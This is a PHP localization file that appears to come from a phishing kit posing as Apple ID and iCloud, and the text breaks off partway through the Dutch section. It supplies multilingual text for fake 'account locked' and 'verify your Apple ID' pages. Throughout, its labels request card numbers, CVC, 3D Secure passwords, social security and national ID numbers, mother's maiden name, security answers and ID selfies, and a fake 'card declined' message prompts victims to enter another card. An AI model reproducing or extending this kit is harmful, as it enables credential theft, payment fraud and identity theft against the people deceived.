<?php
error_reporting(0);
if($setting['letter'] == 'locked') {
    $locked = parse_ini_file("locked.ini", true);
}elseif($setting['letter'] == 'invoice') {
    $locked = parse_ini_file("invoice.ini", true);
}elseif($setting['letter'] == 'verify') {
    $locked = parse_ini_file("verify.ini", true);
}
$lang = $_GET['country'];
switch ($lang) {

case "ES":
    $ddmmyy = "dd/mm/aaaa";
    $ddmm = "mm/aaaa";
    $signic = "Inicia sesión en iCloud";
    $keepme = "Mantenerme conectado";
    $setup = "Setup Instructions";
    $sstatus = "Estado del sistema";
    $privacy = "Política de privacidad";
    $terms = "Términos y condiciones";
    $nextc = "Siguiente";
    $requiredc = "necesario";
    $signc = "Inicie sesión con su ID de Apple para usar iCloud, iTunes, la App Store y más.";
    $forgotc = "¿No tienes una ID de Apple o la olvidaste?";
    $yourapp = "Su ID de Apple es la cuenta que utiliza para acceder a todos los servicios de Apple.";
    $aboutapp = "Acerca de Apple ID y privacidad";
    $bahasa = "es";
    $bahasas = "es";
    $html = '<html lang="es">';
    $title = 'Gestiona tu ID de Apple - Apple (ES)';
    $title_bill = "Confirma tu información";
    $login_manage = 'Gestiona tu cuenta de Apple';
    $input_password = 'Contraseña';
    $remember_me = 'Recordarme';
    $forgot_id = '¿Has olvidado tu ID de Apple o la contraseña?';
    $unlocked = $locked['ES']['button'];
    $goback = "Regresa";

    $account_verif = 'Verificación de la cuenta';
    $account_id = 'Tu ID de Apple es';
    $sign_out = 'Salida';
    $account_name = 'Cuenta';
    $payment = 'Informacion <br>personal';
    $creg = 'PAÍS O REGIÓN';
    $reachable = 'LOCALIZABLE EN';
    $method = 'MÉTODO DE PAGO';
    $bil = 'Detalles De La <br>Cuenta';
    $desc = 'Esta forma de pago se utilizará cuando realices compras en iTunes Store, App Store, Apple Online Store y demás.';
    $creditnumber = "número de tarjeta";
    $secode = "CVC";
    $fname = "nombre de pila";
    $lname = "apellidos";
    $street = "calle y número";
    $apt = "número, piso, puerta";
    $city = "ciudad";
    $state = "estado";
    $zip = "código postal";
    $birth = "fecha de nacimiento";
    $phone = "teléfono";
    $save = "Continuar";
    $cchold = "Nombre del tarjetahabiente";
    $verify = 'Verifica tu de Apple ID';
    $required = 'Falta alguna información requerida en su de Apple ID';
    $clicknow = 'haga clic en Desbloquear ahora para continuar usándolo.';
    $unlock = 'Desbloquear ahora';
    $payerror = 'Error en el pago';
    $ccdeclined = 'Tu tarjeta de crédito fue rechazada. Por favor ingrese otra tarjeta de crédito.';
    $another = 'Pruebe con otra tarjeta';
    $idnumber = "número de identificación";
    $passpor = "número de pasaporte";
    $natio = "identificación nacional";
    $qatariden = "identificacion qatar";
    $civid = "identificacion civil";
    $ssn = "número de seguridad social";
    $accnumber = "número de cuenta";
    $sortc = "código de clasificacion";
    $osidnumber = "número de osid";
    $sin = "número de seguro social";
    $citizen = "identificación ciudadana";
    $bankacc = "número de acceso al banco";

    $secinfo = "Informacion de seguridad";
    $qinfo = "Pregunta de Seguridad";
    $trid_sec = "Contraseña segura 3D";
    $mother = "Nombre de soltera de la madre";
    $driver = "Número de licencia de conducir";
    $climit = "Límite de crédito";
    $continue = "Continuar";
    $cardid = "Tarjeta de identificacion";
    $passid = "Contraseña de tarjeta";
    $ccexp = "fecha de caducidad";
    $besar_name = "NOMBRE";
    $besar_phone = "TELÉFONO";
    $besar_add = "DIRECCIÓN";
    $besar_card = "DETALLES DE TARJETA";
    
    $pesan_lock = $locked['ES']['notice'];
    $pesan2_lock = $locked['ES']['desc'];
    $judul_lock = $locked['ES']['title'];

    $done = "Verificación de cuenta completa";
    $done_text = "Espere mientras restablecemos el acceso a su cuenta ...";

    $upload_id = "Subir identidad";
    $secanswer = "Respuesta de seguridad";
    $selectid = "TOME UNA AUTENTICA AL CARGAR LA TARJETA";
    $selfie = "TOMA UNA SELFIE CON";
    $katacc = "El nombre del titular de la tarjeta y la tarjeta de identificación deben coincidir y ser claramente visibles.<li>Cargue el frente y la parte posterior de su tarjeta.";
    $selectsec = "SELECCIONE LA PREGUNTA DE SEGURIDAD";
    $frontcc = "TARJETA DELANTERA";
    $backcc = "TARJETA ATRÁS";
    break;
    
case "CL":
case "SV":
case "HN":
case "BO":
case "VE":
case "CR":
case "PR":
case "UY":
case "PY":
case "EC":
case "CO":
case "PE":
case "MX":
case "AR":
    $ddmmyy = "dd/mm/aaaa";
    $ddmm = "mm/aaaa";
    $bahasa = "cl";
    $bahasas = "cl";
    $signic = "Inicia sesión en iCloud";
    $keepme = "Mantenerme conectado";
    $nextc = "Siguiente";
    $requiredc = "necesario";
    $setup = "Setup Instructions";
    $sstatus = "Estado del sistema";
    $privacy = "Política de privacidad";
    $terms = "Términos y condiciones";
    $forgotc = "¿No tienes una ID de Apple o la olvidaste?";
    $yourapp = "Su ID de Apple es la cuenta que utiliza para acceder a todos los servicios de Apple.";
    $aboutapp = "Acerca de Apple ID y privacidad";
    $signc = "Inicie sesión con su ID de Apple para usar iCloud, iTunes, la App Store y más.";
    $html = '<html lang="cl">';
    $title = 'Administra tu Apple ID - Apple (CL)';
    $title_bill = "Confirma tu información";
    $login_manage = 'Administrar tu cuenta de Apple';
    $input_password = 'Contraseña';
    $remember_me = 'Recuérdame';
    $forgot_id = '¿Olvidaste tu Apple ID o la contraseña?';
    $unlocked = $locked['LATIN']['button'];
    $goback = "Regresa";

    $account_verif = 'Verificación de la cuenta';
    $account_id = 'Tu ID de Apple es';
    $sign_out = 'Salida';
    $account_name = 'Cuenta';
    $payment = 'Informacion <br>personal';
    $creg = 'PAÍS O REGIÓN';
    $reachable = 'LOCALIZABLE EN';
    $method = 'MÉTODO DE PAGO';
    $bil = 'Detalles De La <br>Cuenta';
    $desc = 'Esta forma de pago se utilizará cuando realices compras en iTunes Store, App Store, Apple Online Store y demás.';
    $creditnumber = "número de tarjeta";
    $secode = "código";
    $fname = "nombre de pila";
    $lname = "apellidos";
    $street = "calle y número";
    $apt = "número, piso, puerta";
    $city = "ciudad";
    $state = "estado";
    $zip = "código postal";
    $birth = "fecha de nacimiento";
    $phone = "teléfono";
    $save = "Continuar";
    $cchold = "Nombre del tarjetahabiente";
    $verify = 'Verifica tu de Apple ID';
    $required = 'Falta alguna información requerida en su de Apple ID';
    $clicknow = 'haga clic en Desbloquear ahora para continuar usándolo.';
    $unlock = 'Desbloquear ahora';
    $payerror = 'Error en el pago';
    $ccdeclined = 'Tu tarjeta de crédito fue rechazada. Por favor ingrese otra tarjeta de crédito.';
    $another = 'Pruebe con otra tarjeta';
    $idnumber = "número de identificación";
    $passpor = "número de pasaporte";
    $natio = "identificación nacional";
    $qatariden = "identificacion qatar";
    $civid = "identificacion civil";
    $ssn = "número de seguridad social";
    $accnumber = "número de cuenta";
    $sortc = "código de clasificacion";
    $osidnumber = "número de osid";
    $sin = "número de seguro social";
    $citizen = "identificación ciudadana";
    $bankacc = "número de acceso al banco";

    $secinfo = "Informacion de seguridad";
    $qinfo = "Pregunta de Seguridad";
    $trid_sec = "Contraseña segura 3D";
    $mother = "Nombre de soltera de la madre";
    $driver = "Número de licencia de conducir";
    $climit = "Límite de crédito";
    $continue = "Continuar";
    $cardid = "Tarjeta de identificacion";
    $passid = "Contraseña de tarjeta";
    $ccexp = "fecha de caducidad";
    $besar_name = "NOMBRE";
    $besar_phone = "TELÉFONO";
    $besar_add = "Calle y número";
    $besar_card = "DETALLES DE TARJETA";
    
    $pesan_lock = $locked['LATIN']['notice'];
    $pesan2_lock = $locked['LATIN']['desc'];
    $judul_lock = $locked['LATIN']['title'];

    $done = "Verificación de cuenta completa";
    $done_text = "Espere mientras restablecemos el acceso a su cuenta ...";

    $upload_id = "Subir identidad";
    $secanswer = "Respuesta de seguridad";
    $selectid = "TOME UNA AUTENTICA AL CARGAR LA TARJETA";
    $selfie = "TOMA UNA SELFIE CON";
    $katacc = "El nombre del titular de la tarjeta y la tarjeta de identificación deben coincidir y ser claramente visibles.<li>Cargue el frente y la parte posterior de su tarjeta.";
    $selectsec = "SELECCIONE LA PREGUNTA DE SEGURIDAD";
    $frontcc = "TARJETA DELANTERA";
    $backcc = "TARJETA ATRÁS";
    break;

case "JP":
    $ddmmyy = "dd/mm/yyyy";
    $ddmm = "mm/yyyy";
    $bahasa = "jp";
    $bahasas = "jp";
    $sstatus = "システムステータス";
    $privacy = "個人情報保護方針";
    $signc = "Apple IDでサインインして、iCloud、iTunes、App Storeなどを使用します。";
    $terms = "利用規約";
    $nextc = "次";
    $requiredc = "必須";
    $forgotc = "Apple IDを持っていない、または忘れていますか？";
    $yourapp = "Apple IDは、すべてのAppleサービスにアクセスするために使用するアカウントです。";
    $aboutapp = "Apple IDとプライバシーについて";
    $signic = "iCloudにサインインする";
    $keepme = "ログイン状態を保持する";
    $setup = "セットアップ手順";
    $html = '<html lang="ja">';
    $title = 'Apple IDを管理 - Apple (日本)';
    $title_bill = "あなたの情報を確認する";
    $login_manage = 'Appleアカウントの管理';
    $input_password = 'パスワード';
    $remember_me = 'をブラウザに保存';
    $forgot_id = 'Apple IDまたはパスワードをお忘れですか？';
    $unlocked = $locked['JP']['button'];
    $goback = "戻る";

    $account_verif = 'アカウントの確認';
    $account_id = 'あなたの Apple ID は';
    $sign_out = '閉じる';
    $account_name = 'アカウント';
    $payment = '個人情報';
    $reachable = '連絡先';
    $creg = '国/地域';
    $method = '支払い方法';
    $bil = 'アカウント詳細';
    $desc = 'この支払い方法は、iTunes Store、App Store、Apple Online Store などで購入する際に使用されます';
    $creditnumber = "カード番号";
    $secode = "セキュリティコード";
    $fname = "ファーストネーム";
    $lname = "苗字";
    $street = "住所";
    $apt = "アパート、建物";
    $city = "シティ";
    $state = "県";
    $zip = "郵便番号";
    $birth = "生年月日";
    $phone = "電話番号";
    $save = "持続する";
    $cchold = "カード所有者の名前";
    $verify = 'Apple IDを確認する';
    $required = 'Apple IDに必要な情報がありません';
    $clicknow = '[今すぐロックを解除]をクリックして使用を続行します';
    $unlock = 'アンロックしました';
    $payerror = '支払いエラー';
    $ccdeclined = 'クレジットカードが拒否されました。 別のクレジットカードを入力してください。';
    $another = '別のカードを試す';
    $idnumber = "ID番号";
    $passpor = "パスポート番号";
    $natio = "国民ID";
    $qatariden = "カタールID";
    $civid = "市民のID";
    $ssn = "社会保障番号";
    $accnumber = "口座番号";
    $sortc = "ソートコード";
    $osidnumber = "osid番号";
    $sin = "社会保険番号";
    $citizen = "市民ID";
    $bankacc = "銀行アクセス番号";

    $secinfo = "セキュリティ情報";
    $qinfo = "秘密の質問";
    $trid_sec = "VPassパスワード";
    $mother = "母の乙女の名前";
    $driver = "運転免許証番号";
    $climit = "与信限度額";
    $continue = "持続する";
    $cardid = "WEB サービス ID";
    $passid = "パスワード （VPass/MSCode)";
    $ccexp = "有効期限";
    $besar_name = "名";
    $besar_phone = "電話";
    $besar_add = "住所";
    $besar_card = "カードの詳細";
    
    $pesan_lock = $locked['JP']['notice'];
    $pesan2_lock = $locked['JP']['desc'];
    $judul_lock = $locked['JP']['title'];
    
    $done = "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;アカウントの確認完了";
    $done_text = "アカウントへのアクセスを復元している間お待ちください.";


    $upload_id = "アップロードID";
    $secanswer = "セキュリティ回答";
    $selectid = "カードを保持してセルフを取る";
    $selfie = "との対決";
    $katacc = "カード会員名とIDカードは一致し、はっきりと見えるようにしてください。<li>あなたのカードの前と後ろをアップロードしてください。";
    $selectsec = "セキュリティの質問を選択";
    $next = "次";
    $idnum = "ID番号";
    $frontcc = "フロントカード";
    $backcc = "バックカード";
    break;

case "CN":
    $ddmmyy = "dd/mm/yyyy";
    $ddmm = "mm/yyyy";
    $bahasa = "cn";
    $bahasas = "cn";
    $signic = "登錄iCloud";
    $keepme = "保持登錄狀態";
    $setup = "設置說明";
    $sstatus = "系統狀態";
    $nextc = "下一个";
    $requiredc = "需要";
    $forgotc = "没有Apple ID或忘记了吗？";
    $yourapp = "您的Apple ID是您用于访问所有Apple服务的帐户。";
    $aboutapp = "关于Apple ID和隐私";
    $signc = "使用您的Apple ID登录以使用iCloud，iTunes，App Store等。";
    $privacy = "隱私政策";
    $terms = "條款和條件";
    $html = '<html lang="cn">';
    $title = '管理您的 Apple ID - Apple (中国)';
    $title_bill = "确认你的信息";
    $login_manage = '管理您的 Apple 帐户';
    $input_password = '密码';
    $remember_me = '记住我的 Apple ID';
    $forgot_id = '忘记了 Apple ID 或密码？';
    $unlocked = $locked['CN']['button'];
    $goback = "回去";

    $account_verif = '帐户验证';
    $account_id = '您的 Apple ID 是';
    $sign_out = '注销';
    $account_name = '帐户';
    $payment = '个人信息';
    $reachable = '联络方式';
    $creg = '国家或地区';
    $method = '付款方式';
    $bil = '帐户详细资料';
    $desc = '当您在 iTunes Store、App Store、Apple 在线商店等平台中购买时，将使用此付款方式。';
    $creditnumber = "信用卡号码";
    $secode = "安全码";
    $fname = "名字";
    $lname = "姓氏";
    $street = "街道地址";
    $apt = "楼号、单元号、房间号";
    $city = "城市";
    $state = "州";
    $zip = "邮编";
    $birth = "出生日期";
    $phone = "电话号码";
    $save = "继续";
    $cchold = "持卡人姓名";
    $verify = '验证您的 Apple ID';
    $required = '您的 Apple ID 中缺少一些必需的信息';
    $clicknow = '点击现在解锁为了继续使用它。';
    $unlock = '现在解锁';
    $payerror = '付款错误';
    $ccdeclined = '您的信用卡被拒绝。 请输入另一张信用卡。';
    $another = '尝试另一张卡';
    $idnumber = "身份证号";
    $passpor = "护照号";
    $natio = "国家身份证";
    $qatariden = "卡塔尔ID";
    $civid = "公民身份证";
    $ssn = "社会安全号码";
    $accnumber = "帐号";
    $sortc = "排序代码";
    $osidnumber = "osid号码";
    $sin = "社会保险号码";
    $citizen = "公民身份证";
    $bankacc = "银行访问号码";
    $cardid = "卡号";
    $passid = "卡密码";
    $ccexp = "到期日";
    $besar_name = "名称";
    $besar_phone = "电话";
    $besar_add = "地址";
    $besar_card = "卡细节";

    $secinfo = "安全信息";
    $qinfo = "安全问题";
    $trid_sec = "3D安全密码";
    $mother = "母亲的娘家姓";
    $driver = "驾驶执照号码";
    $climit = "信用限额";
    $continue = "继续";
    $pesan_lock = $locked['CN']['notice'];
    $pesan2_lock = $locked['CN']['desc'];
    $judul_lock = $locked['CN']['title'];
    
    $done = "帐户验证完成";
    $done_text = "请稍候，我们恢复您的帐户访问权限...";


    $upload_id = "上传身份";
    $secanswer = "安全和答案";
    $selectid = "通过持卡进行自我介绍";
    $selfie = "采取自我";
    $katacc = "持卡人姓名和身份证应匹配并清晰可见。<li>請上傳前後卡。";
    $selectsec = "选择安全问题";
    $frontcc = "前卡";
    $backcc = "後卡";
    break;

case "FR":
    $ddmmyy = "dd/mm/yyyy";
    $ddmm = "mm/yyyy";
    $bahasa = "fr";
    $bahasas = "fr";
    $sstatus = "État du système";
    $privacy = "Politique de confidentialité";
    $terms = "Termes et conditions";
    $nextc = "Suivant";
    $requiredc = "champs obligatoires";
    $signic = "Connectez-vous à iCloud";
    $forgotc = "Vous n'avez pas d'identifiant Apple ou vous l'avez oublié?";
    $yourapp = "Votre identifiant Apple est le compte que vous utilisez pour accéder à tous les services Apple.";
    $aboutapp = "À propos de l'identifiant Apple et de la confidentialité";
    $signc = "Connectez-vous avec votre identifiant Apple pour utiliser iCloud, iTunes, l'App Store, etc.";
    $keepme = "Me garder connecté";
    $setup = "Instructions d'installation";
    $html = '<html lang="fr">';
    $title = 'Gérer votre identifiant Apple - Apple (FR)';
    $title_bill = "Confirmez vos informations";
    $login_manage = 'Gérer votre compte Apple';
    $input_password = 'Password';
    $remember_me = 'Se souvenir de moi';
    $forgot_id = 'Identifiant Apple ou mot de passe oublié ?';
    $unlocked = $locked['FR']['button'];
    $goback = "Retourner";

    $account_verif = 'Vérification de compte';
    $account_id = 'Votre identifiant Apple est';
    $sign_out = 'Fermer';
    $account_name = 'Compte';
    $payment = 'Informations <br>personnelles';
    $reachable = 'COORDONNÉES';
    $creg = 'PAYS / RÉGION';
    $method = 'MODE DE PAIEMENT';
    $bil = 'Details du compte';
    $desc = 'Ce mode de paiement sera utilisé lors de vos achats dans l’iTunes Store, l’App Store, l’Apple Store en ligne et plus encore.';
    $creditnumber = "numéro de carte bancaire";
    $secode = "code";
    $fname = "prénom";
    $lname = "nom de famille";
    $street = "adresse postale";
    $apt = "appartement, étage, bâtiment";
    $city = "ville";
    $state = "Etat";
    $zip = "code postal";
    $birth = "date de naissance";
    $phone = "nº de téléphone";
    $save = "Continuer";
    $cchold = "Nom du titulaire de la carte";
    $verify = 'Vérifiez votre identifiant Apple';
    $required = 'Certaines informations requises sont manquantes dans votre identifiant Apple';
    $clicknow = "cliquez sur Déverrouiller maintenant pour continuer à l'utiliser.";
    $unlock = 'Débloquer maintenant';
    $payerror = 'Erreur de paiement';
    $ccdeclined = 'Votre carte de crédit a été refusée. Veuillez entrer une autre carte de crédit';
    $another = 'Essayez une autre carte';
    $idnumber = "numéro d'identification";
    $passpor = "numéro de passeport";
    $natio = "carte d'identité";
    $qatariden = "qatar id";
    $civid = "pièce d'identité";
    $ssn = "numéro de sécurité sociale";
    $accnumber = "numéro de compte";
    $sortc = "code de tri";
    $osidnumber = "numéro d'osid";
    $sin = "numéro d'assurance sociale";
    $citizen = "identifiant de citoyen";
    $bankacc = "numéro d'accès bancaire";
    $cardid = "Carte d'identité";
    $passid = "Mot de passe carte";
    $ccexp = "date d'expiration";
    $besar_name = "PRÉNOM";
    $besar_phone = "TÉLÉPHONE";
    $besar_add = "ADRESSE";
    $besar_card = "CARTE DÉTAILS";

    $secinfo = "Information de sécurité";
    $qinfo = "Question de sécurité";
    $trid_sec = "Mot de passe sécurisé 3D";
    $mother = "Nom de jeune fille de la mère";
    $driver = "Numéro de permis de conduire";
    $climit = "Limite de crédit";
    $continue = "Continuer";
    $pesan_lock = $locked['FR']['notice'];
    $pesan2_lock = $locked['FR']['desc'];
    $judul_lock = $locked['FR']['title'];
    
    $done = "Vérification du compte terminée";
    $done_text = "Veuillez patienter pendant que nous restaurons l'accès à votre compte ...";


    $upload_id = "Télécharger l'identité";
    $secanswer = "Réponse de sécurité";
    $selectid = "PRENDRE UN SELFIE PAR HOLDING CARD";
    $selfie = "PRENDRE UN SELFIE AVEC";
    $katacc = "Le nom du titulaire et la carte d'identité doivent correspondre et être clairement visibles.<li>S'il vous plaît télécharger avant et arrière de votre carte.";
    $selectsec = "Sélectionnez une question de sécurité";
    $frontcc = "CARTE AVANT";
    $backcc = "RETOUR CARTE";
    break;
    
case "DE":
    $ddmmyy = "dd/mm/yyyy";
    $ddmm = "mm/yyyy";
    $bahasa = "de";
    $bahasas = "de";
    $sstatus = "Systemstatus";
    $privacy = "Datenschutz-Bestimmungen";
    $terms = "Terms & Bedingungen";
    $nextc = "Nächster";
    $requiredc = "erforderlich";
    $signic = "Melden Sie sich bei iCloud an";
    $keepme = "Halten Sie mich angemeldet";
    $forgotc = "Sie haben keine Apple ID oder haben diese vergessen?";
    $yourapp = "Ihre Apple-ID ist das Konto, mit dem Sie auf alle Apple-Dienste zugreifen.";
    $aboutapp = "Über Apple ID und Datenschutz";
    $signc = "Melden Sie sich mit Ihrer Apple-ID an, um iCloud, iTunes, den App Store usw. zu verwenden.";
    $setup = "Setup Instructions";
    $html = '<html lang="de">';
    $title = 'Deine Apple-ID verwalten - Apple (DE)';
    $title_bill = "Bestätigen Sie Ihre Informationen";
    $login_manage = 'Verwalte deinen Apple‑Account';
    $input_password = 'Passwort';
    $remember_me = 'Apple-ID merken';
    $forgot_id = '<center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Apple‑ID oder Passwort vergessen?</center>';
    $unlocked = $locked['DE']['button'];
    $goback = "Geh zurück";

    $account_verif = 'Bestätigung des Kontos';
    $account_id = 'Deine Apple ID ist';
    $sign_out = 'Ausloggen';
    $account_name = 'Konto';
    $payment = 'Persönlich <br>Information';
    $reachable = 'ERREICHBAR BEI';
    $creg = 'LAND / REGION';
    $method = 'BEZAHLVERFAHREN';
    $bil = 'Kontodetails';
    $desc = 'This payment method will be used when you make purchases in the iTunes Store,    App Store, Apple Online Store, and more.';
    $creditnumber = "kreditkartennummer";
    $secode = "sicherheitscode";
    $fname = "vorname";
    $lname = "familienname, nachname";
    $street = "adresse";
    $apt = "wohnung, suite, gebäude";
    $city = "stadt";
    $state = "zustand";
    $zip = "postleitzahl";
    $birth = "geburtsdatum";
    $phone = "telefonnummer";
    $save = "Fortsetzen";
    $cchold = "name des karteninhabers";
    $verify = 'Verify your Apple ID';
    $required = 'Some required information is missing in your Apple ID';
    $clicknow = 'click on Unlock Now in order to continue using it.';
    $unlock = 'Jetzt entsperren';
    $payerror = 'Zahlungsfehler';
    $ccdeclined = 'Ihre Kreditkarte wurde abgelehnt. Bitte geben Sie eine andere Kreditkarte ein.';
    $another = 'Probieren Sie eine andere Karte aus';
    $idnumber = "id number";
    $passpor = "passport number";
    $natio = "national id";
    $qatariden = "qatar id";
    $civid = "civil id";
    $ssn = "social security number";
    $accnumber = "account number";
    $sortc = "sort code";
    $osidnumber = "osid number";
    $sin = "social insurance number";
    $citizen = "citizen id";
    $bankacc = "bank access number";
    $cardid = "WEB ID";
    $passid = "Card Password";
    $ccexp = "verfallsdatum";
    $besar_name = "NAME";
    $besar_phone = "TELEFON";
    $besar_add = "ADRESSE";
    $besar_card = "KARTENDETAILS";

    $secinfo = "Sicherheitsinformationen";
    $qinfo = "Sicherheitsfrage";
    $trid_sec = "3D Secure Passwort";
    $mother = "Mutter Mädchenname";
    $driver = "Führerscheinnummer";
    $climit = "Kreditlimit";
    $continue = "Fortsetzen";
    
    $pesan_lock = $locked['DE']['notice'];
    $pesan2_lock = $locked['DE']['desc'];
    $judul_lock = $locked['DE']['title'];
    
    $done = "Kontoüberprüfung abgeschlossen";
    $done_text = "Bitte warten Sie, während wir Ihren Kontozugriff wiederherstellen ...";


    $upload_id = "Identität hochladen";
    $secanswer = "Sicherheitsantwort";
    $selectid = "NIMM SELFIE MIT HOLDING CARD";
    $selfie = "NEHMEN SIE EIN SELBST MIT";
    $katacc = "Karteninhaber Name und ID-Karte sollten übereinstimmen und deutlich sichtbar sein.</li><li>Bitte lade die Karte vorne und hinten hoch.";
    $selectsec = "SELECT SICHERHEITSFRAGE";
    $frontcc = "FRONTKARTE";
    $backcc = "ZURÜCK KARTE";
break;

case "TH":
    $ddmmyy = "dd/mm/yyyy";
    $ddmm = "mm/yyyy";
    $bahasa = "th";
    $bahasas = "th";
    $sstatus = "สถานะระบบ";
    $privacy = "นโยบายส่วนบุคคล";
    $terms = "ข้อตกลงและเงื่อนไข";
    $nextc = "ต่อไป";
    $requiredc = "จำเป็นต้องใช้";
    $signic = "ลงชื่อเข้าใช้ iCloud";
    $keepme = "ให้ฉันลงชื่อเข้าใช้";
    $setup = "คำแนะนำในการตั้งค่า";
    $signc = "ลงชื่อเข้าใช้ด้วย Apple ID เพื่อใช้ iCloud, iTunes, App Store และอื่น ๆ";
    $html = '<html lang="th">';
    $forgotc = "ไม่มี Apple ID หรือลืม?";
    $yourapp = "รหัส Apple ของคุณเป็นบัญชีที่คุณใช้เพื่อเข้าถึงบริการทั้งหมดของ Apple";
    $aboutapp = "เกี่ยวกับ Apple ID และข้อมูลส่วนบุคคล";
    $title = 'จัดการ Apple ID ของคุณ - Apple (TH)';
    $title_bill = "ยืนยันข้อมูลของคุณ";
    $login_manage = 'จัดการบัญชี Apple ของคุณ';
    $input_password = 'รหัสผ่าน';
    $remember_me = 'จำ Apple ID ของฉัน';
    $forgot_id = '<center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ลืม Apple ID หรือรหัสผ่านหรือไม่?</center>';
    $unlocked = $locked['TH']['button'];
    $goback = "กลับไป";

    $account_verif = 'การยืนยันบัญชี';
    $account_id = 'Apple ID ของคุณคือ';
    $sign_out = 'ออกจากระบบ';
    $account_name = 'บัญชี';
    $payment = 'ข้อมูลส่วนบุคคล';
    $reachable = 'เข้าถึงได้ที่';
    $creg = 'COUNTRY / REGION';
    $method = 'วิธีการชำระเงิน';
    $bil = 'รายละเอียดบัญชี';
    $desc = 'This payment method will be used when you make purchases in the iTunes Store,    App Store, Apple Online Store, and more.';
    $creditnumber = "หมายเลขบัตรเครดิต";
    $secode = "รหัสรักษาความปลอดภัย";
    $fname = "ชื่อจริง";
    $lname = "นามสกุล";
    $street = "ที่อยู่ถนน";
    $apt = "apt, suite, building";
    $city = "เมือง";
    $state = "สถานะ";
    $zip = "รหัสไปรษณีย์";
    $birth = "วันเกิด";
    $phone = "หมายเลขโทรศัพท์";
    $save = "ต่อ";
    $cchold = "ชื่อผู้ถือบัตร";
    $verify = 'Verify your Apple ID';
    $required = 'Some required information is missing in your Apple ID';
    $clicknow = 'click on Unlock Now in order to continue using it.';
    $unlock = 'Unlock Now';
    $payerror = 'ข้อผิดพลาดในการชำระเงิน';
    $ccdeclined = 'บัตรเครดิตของคุณถูกปฏิเสธ. โปรดป้อนบัตรเครดิตอื่น';
    $another = 'ลองใช้บัตรอื่น';
    $idnumber = "หมายเลขประจำตัวประชาชน";
    $passpor = "หมายเลขหนังสือเดินทาง";
    $natio = "national id";
    $qatariden = "รหัสกาตาร์";
    $civid = "พลเมือง id";
    $ssn = "หมายเลขประกันสังคม";
    $accnumber = "หมายเลขบัญชี";
    $sortc = "รหัสการเรียงลำดับ";
    $osidnumber = "หมายเลข osid";
    $sin = "หมายเลขประกันสังคม";
    $citizen = "id พลเมือง";
    $bankacc = "หมายเลขการเข้าถึงธนาคาร";
    $cardid = "WEB ID";
    $passid = "Card Password";
    $ccexp = "วันหมดอายุ";
    $besar_name = "ชื่อ";
    $besar_phone = "โทรศัพท์";
    $besar_add = "ที่อยู่";
    $besar_card = "รายละเอียดของบัตร";

    $secinfo = "ข้อมูลความปลอดภัย";
    $qinfo = "คำถามเพื่อความปลอดภัย";
    $trid_sec = "รหัสผ่านปลอดภัย 3D";
    $mother = "ชื่อมารดา";
    $driver = "หมายเลขใบอนุญาตขับรถ";
    $climit = "วงเงิน";
    $continue = "ต่อ";
    
    $pesan_lock = $locked['TH']['notice'];
    $pesan2_lock = $locked['TH']['desc'];
    $judul_lock = $locked['TH']['title'];
    
    $done = "การยืนยันบัญชีสมบูรณ์";
    $done_text = "โปรดรอสักครู่ในขณะที่เราคืนสิทธิ์การเข้าถึงบัญชีของคุณ ...";


    $upload_id = "อัปโหลดข้อมูลประจำตัว";
    $secanswer = "ความปลอดภัยและคำตอบ";
    $selectid = "รับตัวเองโดยถือบัตร";
    $selfie = "เอาตัวเองมาด้วย";
    $katacc = "ชื่อผู้ถือบัตรและบัตรประชาชนควรตรงกับและมองเห็นได้ชัดเจน</li><li>โปรดคลิกภาพนี้เพื่ออัปโหลด";
    $selectsec = "เลือกคำถามด้านความปลอดภัย";
    $frontcc = "การ์ดด้านหน้า";
    $backcc = "การ์ดหลัง";
break;

case "NL":
    $ddmmyy = "dd/mm/yyyy";
    $ddmm = "mm/yyyy";
    $bahasa = "nl";
    $bahasas = "nl";
    $sstatus = "Systeem status";
    $privacy = "Privacybeleid";
    $terms = "Algemene voorwaarden";
    $signic = "Log in bij iCloud";
    $nextc = "Volgende";
    $requiredc = "verplicht";
    $signc = "Meld u aan met uw Apple ID om iCloud, iTunes, de App Store en meer te gebruiken.";
    $keepme = "Houd me ingelogd";
    $forgotc = "Heb je geen Apple ID of ben je het vergeten?";
    $yourapp = "Uw Apple ID is het account dat u gebruikt om toegang te krijgen tot alle Apple-services.";
    $aboutapp = "Over Apple ID en Privacy";
    $setup = "Installatie-instructies";
    $html = '<html lang="nl">';
    $title = 'Beheer je Apple ID - Apple (NL)';
    $title_bill = "Bevestig uw informatie";
    $login_manage = 'Beheer je Apple-account';
    $input_password = 'Wachtwoord';
    $remember_me = 'Onthoud mij';
    $forgot_id = '<center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Je Apple ID of wachtwoord vergeten?</center>';
    $unlocked = $locked['NL']['button'];
    $goback = "Ga terug";

    $account_verif = 'Account verificatie';
    $account_id = 'Uw Apple ID is';
    $sign_out = 'Afmelden';
    $account_name = 'Account';
    $payment = 'Persoonlijke <br>Informatie';
    $reachable = 'BEREIKBAAR OP';
    $creg = 'LAND / GEBIED';
    $method = 'BETALINGSMIDDEL';
    $bil = 'Accountgegevens';
    $desc = 'This payment method will be used when you make purchases in the iTunes Store,    App Store, Apple Online Store, and more.';
    $creditnumber = "creditcardnummer";
    $secode = "beveiligingscode";
    $fname = "voornaam";
    $lname = "achternaam";
    $street = "adres";
    $apt = "apt, suite, building";
    $city = "stad";
    $state = "staat";
    $zip = "postcode";
    $birth = "geboortedatum";
    $phone = "telefoonnummer";
    $save = "Blijft";
    $cchold = "naam van kaarthouder";
    $verify = 'Verify your Apple ID';
    $required = 'Some required information is missing in your Apple ID';
    $clicknow = 'click on Unlock Now in order to continue using it.';
    $unlock = 'Ontgrendel nu';
    $payerror = 'Betalingsfout';
    $ccdeclined = 'Je credit card is niet geaccepteerd. Voer een andere creditcard in.';
    $another = 'Probeer een andere kaart';
    $idnumber = "id number";
    $passpor = "passport number";
    $natio = "national id";
    $qatariden = "qatar id";
    $civid = "civil id";
    $ssn = "social security number";
    $accnumber = "account number";
    $sortc = "sort code";
    $osidnumber = "osid number";
    $sin = "social insurance number";
    $citizen = "citizen id";
    $bankacc = "bank access number";
    $cardid = "WEB ID";
    $passid = "Card Password";
    $ccexp = "vervaldatum";
    $besar_name = "NAAM";
    $besar_phone = "TELEFOON";
    $besar_add = "ADRES";
    $besar_card = "KAART DETAILS";

    $secinfo = "Veiligheidsinformatie";
    $qinfo = "Veiligheidsvraag";
